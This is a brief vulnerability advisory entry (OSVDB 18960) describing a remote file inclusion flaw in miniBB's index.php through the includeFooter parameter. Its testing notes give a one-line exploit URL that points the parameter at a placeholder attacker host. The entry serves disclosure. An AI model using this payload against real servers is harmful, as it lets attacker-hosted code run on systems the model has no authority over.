miniBB index.php includeFooter Variable Remote File Inclusion

2005-08-16T04:43:23
ID OSVDB:18960
Type osvdb
Reporter OSVDB
Modified 2005-08-16T04:43:23

Description

Manual Testing Notes

http://[target]/[path_to_minibb]/index.php?includeFooter=http://[attacker]

References:

Vendor URL: http://www.minibb.net/ Security Tracker: 1014715 Related OSVDB ID: 18961